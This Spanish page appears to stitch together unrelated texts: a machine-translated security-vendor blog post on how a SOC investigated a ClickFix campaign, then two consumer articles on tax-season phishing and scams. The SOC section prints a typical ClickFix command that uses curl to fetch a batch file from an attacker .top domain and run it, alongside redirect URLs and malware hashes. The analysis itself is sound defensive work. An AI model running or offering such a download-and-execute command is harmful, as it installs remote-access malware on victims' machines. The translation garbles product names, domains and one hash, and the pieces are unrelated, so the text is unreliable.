Un cinturón de herramientas SOC para mantener el ritmo de las amenazas en rápida evolución y los tiempos decrecientes de los atacantes, el equipo de operaciones de seguridad LevelBlue aprovecha múltiples herramientas y asociaciones clave para acortar el tiempo entre la detección y la respuesta. A continuación se presentan algunos ejemplos de las herramientas utilizadas por nuestro SOC y algunas de las circunstancias en las que se utilizaría cada herramienta. Una asociación con Sentinelone a través de la seguridad de punto final administrada de LevelBlue con Sentinelone, nuestro SOC ha proporcionado un valor excepcional con una mayor protección y visibilidad de punto final a nuestros clientes. El SOC pudo reducir en gran medida el tiempo entre la detección y la respuesta con las alarmas STAR (respuesta activa de la historia) dentro de Sentinelone. Estas alarmas estelares son construidas a medida por nuestro equipo y están informadas por detecciones proactivas de nuestros cazadores de amenazas en torno a amenazas recientes y TTP (técnicas, tácticas y procedimientos). Al utilizar informes de inteligencia de amenazas y datos en cuestión, nuestro equipo pudo realizar una revisión más profunda sobre los TTP de amenazas recientes. Esto permitió la creación de reglas personalizadas para detectar más rápidamente los COI (indicadores de compromiso) dentro de los entornos de nuestros clientes. Nuestro equipo de inteligencia de amenazas de LevelBlue Labs también utilizó esta información para crear nuevas reglas en USM en cualquier lugar, nuestra plataforma Open XDR. Como socio de seguridad de confianza, LevelBlue siempre se esfuerza por mejorar nuestros tiempos de detección y respuesta para aumentar el valor y proporcionar un apoyo más proactivo a nuestros clientes. Estas herramientas son vitales para que podamos mejorar los tiempos de respuesta y evitar que las amenazas afecten a nuestros clientes. Bundling Seguridad de punto final administrado y detección y respuesta de amenazas administradas es una excelente opción para los clientes que carecen de ingestión de datos desde los puntos finales en USMA y desean una mejor visibilidad. El paquete también beneficia a los clientes que buscan equilibrar el costo de los socios de seguridad de terceros con los costos de las herramientas de monitoreo adicionales. En lugar de comprar múltiples herramientas para llevar datos potencialmente ruidosos a la USMA, Bundling proporciona una visibilidad integral en sus puntos finales junto con el monitoreo 24/7 que es parte de nuestra oferta administrada de detección de amenazas y respuesta. Intercambio de amenazas abiertas (OTX) El Lablue Labs Open Amenic Exchange (OTX) es otra herramienta integral de la que dependen nuestros analistas durante el triaje e investigación de alarma. Esta plataforma es una de las comunidades de inteligencia de amenazas más grandes con más de 330k+ miembros en todo el mundo. LevelBlue Labs actualiza continuamente OTX, y la inteligencia de amenazas de OTX se integra perfectamente en la plataforma USMA de LevelBlue. Los entornos de nuestros clientes están escaneados para los partidos de pulso OTX y los COI. Si se descubre un indicador de un pulso al cliente en su entorno, se genera una alarma. Al examinar una alarma en USMA, los analistas están dirigidos al pulso asociado. El analista puede usar los COI adicionales asociados con ese pulso para promover su investigación. La centralización de esta información en USMA ayuda a nuestros analistas a racionalizar el triaaje de incidentes y estos pulsos se pueden comparar con otra inteligencia de código abierto (OSINT) para dar a los analistas más contexto en su investigación. Los analistas también pueden usar la ID de pulso OTX directamente dentro de USMA para consultar el entorno de los clientes para cualquier COI adicional asociado con la amenaza que se está investigando. Figura 1: Búsqueda de eventos de instancia del cliente utilizando reglas de estrella de ID de OTX El SoC LevelBlue también ha creado un sistema de alerta personalizado basado en métodos de detección de alta fidelidad que ha aumentado los tiempos de respuesta al brindar estas alertas a la vanguardia de la atención de nuestros analistas. Estos métodos de alta fidelidad, ya sea relacionados con las reglas de estrella personalizadas o las detecciones de compromiso del usuario, son solo otro ejemplo del trabajo proactivo que hace nuestro equipo SOC para mejorar el valor para nuestros clientes. Las Reglas de Star de Sentinelone han demostrado ser una adición invaluable al conjunto de herramientas de detección ya utilizados por el Soc MDR. Cuando se detecta una amenaza y se ha planteado una alarma, un analista de SOC utilizará diferentes herramientas para analizar la amenaza y sus artefactos relacionados. El SOC LevelBlue investiga: ClickFix ClickFix es una campaña de ingeniería social que explota la apariencia de legitimidad para engañar a las víctimas para ejecutar guiones maliciosos. En la siguiente investigación, el SOC utilizó varias herramientas, incluidas las sandbox de Joe, la visibilidad profunda de Sentinelone y la lista de bloques Sentinelone para analizar un ataque de clickFix. La investigación comenzó cuando el SOC recibió una alarma para una línea de comando que es indicativa de malware ClickFix (ver Figura 2). Figura 2: Alarma ClickFix En USMA La línea de comando que se muestra arriba permitió a nuestro equipo obtener el archivo y la información de ese archivo. Con esto, nuestro equipo podría buscar en nuestra base de clientes para determinar si el archivo existía en cualquier otro entorno y agregar los hashs de archivo a nuestra lista de bloques Global Sentinelone. Para revisar esta línea de comando, el SOC generalmente utilizaría un servicio de sandbox en línea como Sandbox de Joe o Anyrun. Joe’s Sandbox es preferible en caso de que haya datos de clientes presentes, porque se ejecuta en un inquilino privado. AnyRun también es una herramienta poderosa, pero su servicio gratuito no es privado y se usa solo si se confirma que no se contienen datos del cliente. Después de ejecutar la línea de comando anterior en Joe’s Sandbox, recibimos un informe de actividad en profundidad (ver Figura 3 a continuación). Figura 3: Línea de comando inicial ejecutada en el ataque de ClickFix después de ejecutar el comando en Joe’s Sandbox, nada apareció en el frente, pero obtuvimos una lista de archivos sospechosos en el informe que se generó (ver Figura 4 a continuación). Figura 4: Lista de archivos sospechosos del informe Sandbox de Joe del archivo. Pudimos recuperar los hashes SHA1 y buscar un compromiso potencial en los entornos de nuestros clientes agrupados. Usando la visibilidad profunda de Sentinelone, nuestro equipo de SOC escribió una consulta simple buscando en los campos de hash de archivo para cualquiera de los hashes obtenidos en nuestro informe: #Hash contiene («A48C95DF3D802FFB6E5ECADA542CC5E028192F2B», «7EC84BE84FE23F0B0093B647538737E1F19EBB03», «C2E5ea8AFCD46694448D812D1FFCD02D1F594022», «3D1999BEE412CBAC0A6D2C4C9FD5509AT12227INE. «98DD757E1C1FA8B5605BDA892AA0B82EBEFA1F07», «01873977C871D3346D795CF7E38888685DE9F0B16»,, «C4E27A43075CE993FF6BB033360AF386B2FC58FF», «906F7E94F841D464D4DA144F7C858FA2160E36DB», «, «A556209655DCB5E939FD404F57D199F2BB6DA9B3», «AD464EB7CF5C19C8A443AB5B590440B32DBC618F») Ejecutando esta consulta mostró US 5 detecciones de un incidente que ocurrió una semana antes en un entorno de diferentes clientes (vea la figura de diferentes clientes (vea la figura 5 a continuación. Figura 5: Detecciones de consultas que buscan hash obtenidos en el informe Nuestro equipo también utilizó la función de lista de bloques de Sentinelone para agregar estos hashes a Blocklist a nivel de alcance global para garantizar que el archivo se mate y se ponga en cuarentena si se detecta en un entorno de cliente (ver Figura 6). Figura 6: Agregar el hash SHA1 de NetSupport Rat a Sentinelone Global Blocklist Al realizar un análisis estático de un sitio web o un enlace de phishing potencial, nuestros analistas normalmente utilizarán un servicio que visita el sitio y proporciona una captura de pantalla de la página, junto con información que incluye el código fuente de la página, redireccionamientos, scripts y cualquier imagen. En el siguiente escenario, nuestro equipo recibió una alarma para una solicitud de DNS a un dominio sospechoso que se incluye en nuestros pulsos OTX (Figura 7). Figura 7: Alarma OTX En USMA para el sitio web comprometido responsable del ataque de ClickFix al revisión inicial, el dominio parecía pertenecer a un sitio web de viajes normal. Luego, nuestro equipo inspeccionó el tráfico de red desde el escaneo del sitio web en la pestaña HTTP a continuación y buscó cualquier redirección que ocurriera durante el escaneo en la pestaña Redireccionamientos (ver Figura 8). Figura 8: escaneo de URL del sitio comprometido Islonline[.]org en la pestaña HTTP, nuestro equipo vio que un archivo titulado J.JS alojado en el sitio navegado al sitio Hxxps[://]lang3666[.]TOP/LV/XFA[.]. Figura 9: Redirigir al archivo JS sospechoso y el dominio .TOP al ejecutar un escaneo de URL, nuestros analistas pudieron recuperar el código fuente del archivo JS: Figura 10: Código fuente del archivo JS alojado en el dominio .TOP Revisión adicional del archivo reveló un script ofuscanado que se usa para determinar si el agente de usuarios es un teléfono móvil o escritorio. El script luego genera un identificador de 8 dígitos que luego se adjunta a la URL HXXPS[://]lang3666[.]superior/lv/índice[.]PHP?. Esto da como resultado descargar otro script para obtener la carga útil final. Los ataques de clickFix a menudo siguen esta cadena de eventos y dan como resultado un comando similar al que se muestra a continuación: cmd.exe/c curl.exe -k -ss -x post https: // pravaix[.]superior/lv/lll[.]php -o «c: \ users \ public \ jkdfgf.bat» && start /min “” c: \ users \ public \ jkdfgf.bat Conclusión Como se ve en la investigación de ClickFix anterior, las integraciones de USM Anywhere permiten que el SoC LevelBlue reduzca en gran medida el tiempo entre la detección y la respuesta. Puede leer más sobre ClickFix y las recomendaciones de LevelBlue SoC para proteger sus entornos en el informe de las tendencias de amenaza de LevelBlue, Foot Me Once: cómo los cibercriminales están dominando el arte del engaño. El contenido proporcionado en este documento es solo para fines informativos generales y no debe interpretarse como asesoramiento legal, regulatorio, de cumplimiento o ciberseguridad. Las organizaciones deben consultar a sus propios profesionales legales, de cumplimiento o ciberseguridad sobre obligaciones específicas y estrategias de gestión de riesgos. Si bien las soluciones de detección y respuesta de amenazas administradas de LevelBlue están diseñadas para respaldar la detección y respuesta de amenazas en el nivel de punto final, no son un sustituto para el monitoreo integral de la red, la gestión de vulnerabilidades o un programa completo de seguridad cibernética.
Etiqueta: ciberseguridad
Ha llegado otra vez esa época del año: ¡temporada de impuestos! Ya sea que ya haya presentado su solicitud con la esperanza de un reembolso anticipado o que aún no haya iniciado el proceso, una cosa es segura: los ciberdelincuentes seguramente utilizarán la temporada de impuestos como un medio para lograr que las víctimas revelen su información personal y financiera. Esta época del año es ventajosa para los actores malintencionados, ya que el IRS y los preparadores de impuestos son algunas de las pocas personas que realmente necesitan sus datos personales. Como resultado, los consumidores son objeto de diversas estafas que se hacen pasar por fuentes confiables como el IRS o empresas de software de impuestos DIY. Afortunadamente, cada año el IRS describe las estafas fiscales más frecuentes, como el phishing por voz, el phishing por correo electrónico y las estafas de software fiscal falso. Exploremos los detalles de estas amenazas. Entonces, ¿cómo utilizan los ciberdelincuentes el phishing de voz para hacerse pasar por el IRS? El phishing por voz, una forma de fraude telefónico criminal, utiliza tácticas de ingeniería social para obtener acceso a la información personal y financiera de las víctimas. En el caso de estafas fiscales, los delincuentes realizarán llamadas no solicitadas haciéndose pasar por el IRS y dejarán mensajes de voz solicitando una devolución de llamada inmediata. Luego, los delincuentes exigirán que la víctima pague una factura de impuestos falsa en forma de transferencia bancaria, tarjeta de débito prepaga o tarjeta de regalo. En un caso descrito por Forbes, las víctimas recibieron correos electrónicos en su bandeja de entrada que supuestamente contenían mensajes de voz del IRS. Los correos electrónicos en realidad no contenían ningún mensaje de voz, sino que dirigían a las víctimas a una URL sospechosa de SharePoint. El año pasado, se produjeron una serie de estafas de phishing de SharePoint como un intento de robar credenciales de Office 365, por lo que no sorprende que los ciberdelincuentes también estén utilizando esta técnica para acceder a los datos personales de los contribuyentes. Además de los esquemas de phishing de voz, los actores maliciosos también utilizan el correo electrónico para intentar que los consumidores proporcionen su información personal y financiera. Sólo este año, se han reportado casi 400 URL de phishing del IRS. En un esquema típico de phishing por correo electrónico, los estafadores intentan obtener información fiscal personal, como nombres de usuario y contraseñas, utilizando direcciones de correo electrónico falsificadas y logotipos robados. En muchos casos, los correos electrónicos contienen hipervínculos sospechosos que redirigen a los usuarios a un sitio falso o archivos adjuntos en PDF que pueden descargar malware o virus. Si una víctima hace clic en estos enlaces o archivos adjuntos maliciosos, puede poner en grave peligro sus datos fiscales al darles a los ladrones de identidad la oportunidad de robar su reembolso. Es más, los ciberdelincuentes también utilizan líneas de asunto como “Aviso importante del IRS” y “Aviso al contribuyente del IRS” y exigen el pago o amenazan con confiscar el reembolso de impuestos de la víctima. Los ciberdelincuentes incluso están llegando a hacerse pasar por marcas confiables como TurboTax para sus estafas. En este caso, a los preparadores de impuestos que buscan el software TurboTax en Google se les muestran anuncios de versiones pirateadas de TurboTax. Las víctimas pagarán una tarifa por el software a través de PayPal, sólo para infectar su computadora con malware después de descargar el software. Quizás se pregunte: ¿cómo encuentran las víctimas este software malicioso mediante una simple búsqueda en Google? Desafortunadamente, los estafadores han estado pagando para que sus sitios falsificados aparezcan en los resultados de búsqueda, lo que aumenta las posibilidades de que un contribuyente inocente sea víctima de su plan. El dinero es un motivador principal para muchos consumidores y los actores maliciosos están totalmente preparados para explotarlo. Muchas personas están preocupadas por cuánto podrían deber o predicen cuánto recuperarán de su reembolso de impuestos, y los estafadores aprovechan ambas emociones. Entonces, mientras cientos de contribuyentes esperan una posible declaración de impuestos, es importante que afronten la temporada de impuestos con prudencia. Consulte los siguientes consejos para evitar que los ciberdelincuentes y ladrones de identidad lo suplanten: Presente su información antes de que los ciberdelincuentes lo hagan por usted. La defensa más fácil que puede tomar contra los esquemas de la temporada de impuestos es conseguir su W-2 y presentarlo lo antes posible. Cuanto más rápido sea para presentar la solicitud, es menos probable que un ciberdelincuente obtenga sus datos. Vigile su crédito y su identidad. Controlar su informe crediticio y saber si su información personal se ha visto comprometida de alguna manera puede ayudar a prevenir el fraude fiscal. Juntos, pueden informarle si alguien ha robado su identidad o si tiene información personal en la web oscura que podría conducir al robo de identidad. Nuestro servicio de monitoreo de crédito puede monitorear los cambios en su puntaje crediticio, informe y cuentas con notificaciones y orientación oportunas para que pueda tomar medidas para abordar el robo de identidad. Nuestro servicio de monitoreo de identidad verifica la web oscura en busca de su información personal, incluido el correo electrónico, identificaciones gubernamentales, información de tarjetas de crédito y cuentas bancarias, y más, y luego proporciona alertas si sus datos se encuentran en la web oscura, con un promedio de 10 meses de anticipación. servicios. Tenga cuidado con los intentos de phishing. Está claro que el phishing es la táctica principal que los delincuentes están aprovechando en esta temporada de impuestos, por lo que es fundamental que esté atento a su bandeja de entrada. Esto significa que si recibe algún correo electrónico desconocido o remotamente sospechoso solicitando datos fiscales, verifique su legitimidad con un gerente o el departamento de seguridad antes de responder. Recuerde: el IRS no iniciará contacto con los contribuyentes por correo electrónico, mensajes de texto o canales de redes sociales para solicitar información personal o financiera. Si alguien te contacta de esa manera, ignora el mensaje. Tenga cuidado con los sitios web falsos. Los estafadores tienen herramientas extremadamente sofisticadas que ayudan a disfrazar direcciones web falsas para software de impuestos de bricolaje, como logotipos de empresas y diseños de sitios robados. Para no caer en esto, ve directamente a la fuente. Escriba la dirección de un sitio web directamente en la barra de direcciones de su navegador en lugar de seguir un enlace de un correo electrónico o una búsqueda en Internet. Si recibe algún enlace sospechoso en su correo electrónico, investigar el dominio suele ser una buena forma de saber si la fuente es legítima o no. Protégete de los mensajes fraudulentos. Los estafadores también envían enlaces a sitios fraudulentos a través de mensajes de texto, mensajes de redes sociales y correo electrónico. McAfee Scam Protection puede ayudarle a detectar si el mensaje que recibió es falso. Utiliza tecnología de inteligencia artificial que detecta automáticamente enlaces a URL fraudulentas. Si hace clic accidentalmente, no se preocupe, puede bloquear sitios riesgosos si lo hace. Limpia tu información personal en línea. Los delincuentes y estafadores tienen que encontrarlo antes de poder contactarlo. Después de todo, necesitan obtener su número de teléfono o correo electrónico de algún lugar. A veces, provienen de “buscadores de personas” y corredores de datos en línea que recopilan y venden información personal a cualquier comprador. Incluidos los delincuentes. McAfee Personal Data Cleanup puede eliminar su información personal de los sitios de intermediarios de datos que los estafadores utilizan para contactar a sus víctimas. Considere una solución de protección contra el robo de identidad. Si por alguna razón sus datos personales se ven comprometidos, asegúrese de utilizar una solución de robo de identidad como McAfee Identity Theft Protection, que permite a los usuarios adoptar un enfoque proactivo para proteger sus identidades con herramientas de recuperación y monitoreo personal y financiero para ayudar a mantener sus identidades personales y seguras. Presentamos McAfee+ Protección contra robo de identidad y privacidad para su vida digital Descargue McAfee+ ahora \x3Cimg height=»1″ width=»1″ style=»display:none» src=»https://www.facebook.com/tr?id= 766537420057144&ev=PageView&noscript=1″ />\x3C/noscript>’);
Es hora de tener listos los formularios de impuestos W-2 y 1099. El 29 de enero, el IRS comenzó a aceptar declaraciones de impuestos en papel y electrónicas antes de la fecha de vencimiento del 15 de abril. Pero mientras los usuarios se preparan para presentar la declaración, los estafadores se preparan para aprovecharse de los contribuyentes inocentes con tácticas maliciosas, buscando recolectar grandes cantidades de datos personales que se encuentran en los documentos tributarios del IRS. Echemos un vistazo a las tácticas comunes que los piratas informáticos pueden aprovechar en esta temporada de impuestos. Esquemas de suplantación de identidad Una táctica comúnmente utilizada consiste en piratas informáticos que se hacen pasar por recaudadores del IRS, preparadores de impuestos o oficinas gubernamentales. Esta táctica es bastante efectiva debido a las preocupaciones de los estadounidenses acerca de declarar mal sus impuestos o tener problemas accidentalmente con el IRS. Los estafadores se aprovechan de este miedo y manipulan a usuarios inocentes para que proporcionen información confidencial o dinero por teléfono o correo electrónico. Y en casos extremos, los piratas informáticos pueden infectar computadoras con malware a través de enlaces maliciosos o archivos adjuntos enviados a través de estafas por correo electrónico del IRS. Robocalls Otra táctica utilizada para aprovecharse de los contribuyentes es la estafa del número de seguro social cancelado. Los piratas informáticos utilizan llamadas automáticas afirmando que las autoridades suspenderán o cancelarán el número de Seguro Social de la víctima en respuesta a los impuestos adeudados. A menudo, las víctimas tienen miedo de devolver la llamada a los números fraudulentos y se les convence para que transfieran activos a cuentas que controla el estafador. Los usuarios deben recordar que el IRS solo se comunicará con los contribuyentes por correo postal o en persona, no por teléfono. Correos electrónicos Otra estafa que utilizan los delincuentes implica los correos electrónicos que se hacen pasar por el IRS. Las víctimas reciben un correo electrónico de phishing que dice ser del IRS, recordándoles que deben presentar sus impuestos u ofreciéndoles información sobre su reembolso de impuestos a través de enlaces maliciosos. Si una víctima hace clic en el enlace, será redirigida a un sitio falso que recopila datos personales de la víctima, lo que facilita el robo de identidad. Es más, el ordenador de una víctima puede infectarse con malware si hace clic en un enlace con código malicioso, lo que permite a los estafadores robar más datos. Los estafadores de contadores públicos falsos también aprovechan el hecho de que muchos usuarios buscan la ayuda de un preparador de impuestos o un contador público certificado durante este tiempo. Estos delincuentes a menudo se hacen pasar por profesionales y aceptan dinero para completar los impuestos de un usuario, pero no firman la declaración. Esto hace que parezca que el usuario completó la devolución por sí mismo. Sin embargo, estos preparadores de impuestos fantasmas a menudo mienten en la declaración para que el usuario califique para créditos que no ha ganado o aplican cambios que lo meterán en problemas. Como los estafadores no firman, la víctima será responsable de cualquier error. Esto podría llevar al usuario a tener que pagar el dinero adeudado o potencialmente dar lugar a una auditoría. Si bien este tipo de estafas pueden ocurrir en cualquier época del año, son especialmente frecuentes antes de la fecha límite de presentación de impuestos de abril. Los consumidores deben estar alerta durante la temporada de impuestos para proteger su información personal y mantener seguras sus finanzas. Para evitar ser falsificado por estafadores y ladrones de identidad, siga estos consejos: Presente su solicitud antes de que un estafador lo haga por usted. La defensa más fácil que puede tomar contra los esquemas de la temporada de impuestos es conseguir su W-2 y presentarlo lo antes posible. Cuanto más rápido sea para presentar la solicitud, es menos probable que un estafador obtenga sus datos. Obtenga una copia de su informe de crédito. Tiene derecho a recibir una copia gratuita de su informe crediticio de cada una de las principales agencias una vez al año. Por lo tanto, acostúmbrese a solicitar una copia de su archivo cada pocos meses y verifique si hay alguna actividad sospechosa. Tenga cuidado con los intentos de phishing. El phishing es una táctica común que aprovechan los delincuentes durante la temporada de impuestos, así que manténgase atento a su bandeja de entrada. Esto significa que si recibe algún correo electrónico desconocido o remotamente sospechoso solicitando datos fiscales, vuelva a verificar su legitimidad. Tenga cuidado con los nombres extraños de archivos adjuntos como “virus-for-you.doc”. Recuerde: el IRS solo contacta a las personas por correo postal, por lo que si recibe un correo electrónico de alguien que dice ser del IRS, aléjese. Tenga cuidado con los sitios web falsos. Los estafadores tienen herramientas extremadamente sofisticadas que ayudan a disfrazar direcciones web falsas para software de impuestos de bricolaje, como logotipos de empresas y diseños de sitios robados. Para no caer en esto, ve directamente a la fuente. Escriba la dirección de un sitio web directamente en la barra de direcciones de su navegador en lugar de seguir un enlace de un correo electrónico o una búsqueda en Internet. Si recibe algún enlace sospechoso en su correo electrónico, investigar el dominio suele ser una buena forma de saber si la fuente es legítima o no. Considere una solución de protección contra el robo de identidad. Si sus datos se ven comprometidos, asegúrese de utilizar una solución de robo de identidad como McAfee Identity Theft Protection, que permite a los usuarios adoptar un enfoque proactivo para proteger sus identidades con herramientas de recuperación y monitoreo personal y financiero para ayudar a mantener sus identidades personales y seguras. . Presentamos McAfee+ Protección contra robo de identidad y privacidad para su vida digital Descargue McAfee+ ahora \x3Cimg height=»1″ width=»1″ style=»display:none» src=»https://www.facebook.com/tr?id= 766537420057144&ev=PageView&noscript=1″ />\x3C/noscript>’);